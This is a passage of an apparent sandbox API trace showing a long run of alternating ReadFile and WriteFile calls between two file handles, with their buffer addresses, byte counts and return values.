nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.746] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.747] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.747] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.748] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.748] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.749] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x8e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.749] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.750] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.750] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.751] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.751] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.752] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.753] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xaa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.753] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.754] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.754] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.754] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.755] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.756] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.756] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.756] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.757] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.757] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.758] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.758] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.759] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ce, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.759] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.760] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x20b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.760] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.761] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x363, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.761] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.762] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.762] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.763] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x382, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.763] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.764] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.764] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.765] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.765] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.766] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.766] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.767] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.767] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.768] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.768] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.769] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.769] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.770] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.770] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.771] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.771] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.772] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.772] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x335, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.773] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.773] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.774] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.774] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.775] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.775] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.776] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.776] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.777] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.777] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.778] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.778] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.779] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x325, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.779] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.780] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.780] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.781] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.785] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.785] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x371, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.786] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.786] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.787] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.787] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x343, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.788] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.788] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.789] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.789] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x331, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.790] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.790] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.791] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.791] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.792] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.792] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.793] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x317, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.793] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.794] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x319, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.794] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.795] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x325, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.795] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.796] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x355, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.796] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.797] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x315, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.797] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.798] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.798] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.799] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x305, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: 